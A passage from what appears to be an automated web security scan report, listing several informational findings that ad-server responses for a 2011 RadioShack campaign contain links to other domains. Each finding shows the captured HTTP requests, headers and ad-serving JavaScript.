document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1452529046?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1452529046?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1452529046?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.110. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806261365?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806261365?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806261365?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806261365?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806261365?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806261365?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806261365?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806261365?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.111. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1370845975?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1370845975?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1370845975?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1370845975?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270995

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:21:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1370845975?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1370845975?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1370845975?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1370845975?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.112. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1624211567?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1624211567?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1624211567?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1624211567?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296264969

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1624211567?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1624211567?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1624211567?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1624211567?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.113. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=118917393?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=118917393?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=118917393?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=118917393?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=118917393?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=118917393?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=118917393?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=118917393?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.114. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=394936567?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=394936567?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:10:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
